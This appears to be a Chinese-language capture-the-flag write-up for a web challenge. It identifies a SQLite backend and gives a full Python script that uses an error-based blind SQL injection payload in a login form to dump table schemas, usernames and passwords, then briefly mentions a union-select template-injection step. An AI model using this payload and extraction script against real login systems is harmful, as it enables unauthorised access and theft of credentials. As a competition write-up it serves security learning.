[Web] PYER xp0int Posted on Apr 29 2021 通过if来判断不是mysql ,ifnull看出是sqlite sql错误会500, 报错盲注 ``` import sys import requests url='http://124.70.199.12:31534/login' sql="select name from sqlite_master where type='table' and name!='comment' and name!='users'" sql="select sql from sqlite_master where name='users' " sql="select username from users" sql="select password from users" #sqlite_not_safe #sql="select sql from sqlite_master where name='comment' " #sql="select group_concat(password) from users " payload="a' or abs(ifnull(nullif(1, unicode(substr(( {}),{},1))={}),0x8000000000000000)) or '0" h='' for i in range(1,10000): for j in range(30,129): t=payload.format(sql,str(i),str(j)) print(t) r=requests.post(url,data={ 'username':t, 'password':'a', }) if r.status_code==500: h+=chr(j) print(h) break ``` 密码sqlite_not_safe 登录 然后又一个sql注入, {{}}有SSTI,直接union select SSTI就行 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册